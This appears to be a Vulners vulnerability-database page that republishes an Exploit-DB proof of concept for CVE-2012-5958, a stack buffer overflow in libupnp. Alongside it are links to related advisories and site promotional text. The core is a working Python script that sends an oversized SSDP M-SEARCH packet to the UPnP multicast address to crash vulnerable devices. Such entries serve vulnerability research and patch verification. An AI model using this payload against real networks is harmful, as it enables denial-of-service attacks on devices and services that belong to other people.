Lucene search
K

libupnp 1.6.18 - Stack-based buffer overflow (DoS)

🗓️ 27 Nov 2020 00:00:00Reported by Patrik LantzType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 1095 Views

libupnp 1.6.18 Stack-based buffer overflow (DoS) exploi

Related
Code
ReporterTitlePublishedViews
Family
0day.today
libupnp 1.6.18 - Stack-based buffer overflow Exploit
27 Nov 202000:00
zdt
FreeBSD
upnp -- multiple vulnerabilities
21 Nov 201200:00
freebsd
ATTACKERKB
UPnP unique_service_name Buffer Overflow
31 Jan 201300:00
attackerkb
Circl
CVE-2012-5958
5 Feb 201300:00
circl
Check Point Advisories
Portable SDK for UPnP Devices libupnp Device Service Name Stack Buffer Overflow (CVE-2012-5958)
3 Mar 201300:00
checkpoint_advisories
CVE
CVE-2012-5958
31 Jan 201321:00
cve
Cvelist
CVE-2012-5958
31 Jan 201321:00
cvelist
Debian
[SECURITY] [DSA 2614-1] libupnp security update
2 Feb 201310:17
debian
Debian
[SECURITY] [DSA 2615-1] libupnp4 security update
2 Feb 201311:22
debian
Debian CVE
CVE-2012-5958
31 Jan 201321:00
debiancve
Rows per page
# Exploit Title: libupnp 1.6.18 - Stack-based buffer overflow (DoS)
# Date: 2020-08-20
# Exploit Author: Patrik Lantz
# Vendor Homepage: https://pupnp.sourceforge.io/
# Software Link: https://sourceforge.net/projects/pupnp/files/pupnp/libUPnP%201.6.6/libupnp-1.6.6.tar.bz2/download
# Version: <= 1.6.6
# Tested on: Linux
# CVE : CVE-2012-5958

import socket

payload = "M-SEARCH * HTTP/1.1\r\nHOST: 239.255.255.250:1900\r\nST:uuid:schemas:device:"
payload += "A"*324 + "BBBB"
payload += ":urn:\r\nMX:2\r\nMAN:\"ssdp:discover\"\r\n\r\n"

byte_message = bytes(payload)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(byte_message, ("239.255.255.250", 1900))

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Nov 2020 00:00Current
6.9Medium risk
Vulners AI Score6.9
CVSS 210
EPSS0.87949
1095